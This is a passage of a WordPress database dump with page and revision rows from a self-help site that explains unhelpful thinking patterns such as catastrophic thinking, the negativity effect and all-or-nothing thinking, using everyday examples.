(1620, 1, '2023-05-30 17:36:03', '2023-05-30 17:36:03', '<!-- wp:paragraph -->\n<p>In our day-to-day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns happening in their minds. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me use an example to explain â€œcatastrophic thinkingâ€. Imagine that a person, who we will call Susan, has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, Susan, because of her catastrophic thinking, straight away thinks of only the worst possible outcome. In this case, Susan immediately thinks, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking patterns is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our minds often â€œimagineâ€ an outcome and then treat that imagination as being true. i.e. it confuses imagination and truth. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s mind imagined that an accident must have happened, when in reality, at that point there was no evidence that anything bad had happened. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view. In the â€œtoolsâ€ section of this website I will give you some techniques to help you do this.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'publish', 'closed', 'closed', '', 'catastrophic-thinking', '', '', '2023-08-08 15:21:10', '2023-08-08 15:21:10', '', 0, 'https://www.happythinking.com/?page_id=1620', 0, 'page', '', 0),
(1621, 1, '2023-05-30 17:36:03', '2023-05-30 17:36:03', '', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-05-30 17:36:03', '2023-05-30 17:36:03', '', 1620, 'https://www.happythinking.com/?p=1621', 0, 'revision', '', 0),
(1625, 1, '2023-05-30 17:43:03', '2023-05-30 17:43:03', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various unhelpful thinking patterns, by discussing one that psychologists call the â€œnegativity effectâ€. This is a common type of unhelpful thinking and is a very important one to understand as it may, in some, contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day to day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone). Unfortunately, oneâ€™s mind may develop an unhelpful thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus almost fully on the lost mobile phone, while ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking is unhelpful because it makes the situation worse than it needs to be, as when one minimises positive events, they donâ€™t help to reduce the emotional impact of negative events. A more â€œhelpfulâ€ way to think would have been to see both the negative and positive events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in a â€œnegativity effectâ€ type unhelpful thinking pattern. This tendency may have been inherited from our ancestors from many thousands of years ago, when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a lion''s tail. If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a lion''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst lions and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the negativity effect type of unhelpful thinking</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when you do the negativity effect type of unhelpful thinking. As I mentioned before, Happy Thinking is about dealing with such unhelpful thinking. Once we have gone over the common types of unhelpful thinking, I will share with you some tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic_thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-05-30 17:43:03', '2023-05-30 17:43:03', '', 1616, 'https://www.happythinking.com/?p=1625', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1623, 1, '2023-05-30 17:40:02', '2023-05-30 17:40:02', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-05-30 17:40:02', '2023-05-30 17:40:02', '', 1620, 'https://www.happythinking.com/?p=1623', 0, 'revision', '', 0),
(1626, 1, '2023-05-30 17:44:52', '2023-05-30 17:44:52', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity_effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-05-30 17:44:52', '2023-05-30 17:44:52', '', 1620, 'https://www.happythinking.com/?p=1626', 0, 'revision', '', 0),
(1627, 1, '2023-05-30 17:46:19', '2023-05-30 17:46:19', '<!-- wp:paragraph -->\n<p>The unhelpful thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between. Unfortunately, one may develop an unhelpful thinking pattern that involves one thinking often in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this unhelpful thinking pattern, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the wordÂ  â€œnothingâ€ represents the other extreme. Psychologists also call this kind of unhelpful thinking, â€œblack and whiteâ€ thinking, implying that one doing all-or-nothing thinking does not think in a more balanced â€œgreyâ€ way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1877,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/all_cups_170623b.jpg" alt="" class="wp-image-1877"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>All-or-nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your mind does all-or-nothing thinking. Your mind will think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall-or-nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Lucy to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all-or-nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s mind does all-or-nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all-or-nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all-or-nothing thinking distorts how things really are, and this can make one make wrong judgments. In the tools section of this website, we will talk about how to see things in a more balanced way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'publish', 'closed', 'closed', '', 'all-or-nothing-thinking', '', '', '2023-08-06 15:58:59', '2023-08-06 15:58:59', '', 0, 'https://www.happythinking.com/?page_id=1627', 0, 'page', '', 0),
(1628, 1, '2023-05-30 17:46:19', '2023-05-30 17:46:19', '', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-05-30 17:46:19', '2023-05-30 17:46:19', '', 1627, 'https://www.happythinking.com/?p=1628', 0, 'revision', '', 0),
(1631, 1, '2023-05-30 17:50:51', '2023-05-30 17:50:51', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity_effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all_or_nothing_thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-05-30 17:50:51', '2023-05-30 17:50:51', '', 1620, 'https://www.happythinking.com/?p=1631', 0, 'revision', '', 0),
(1630, 1, '2023-05-30 17:50:04', '2023-05-30 17:50:04', '<!-- wp:paragraph -->\n<p>As mentioned previously, unhelpful thinking patterns often involve ways of thinking that distort how things really are. The unhelpful thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, one may develop a thinking pattern that involves one thinking in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this thinking, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the word&nbsp; â€œnothingâ€ represents the other extreme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All or nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your brain does all or nothing thinking. Your brain will make you think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall or nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Sally to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all or nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent, but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- 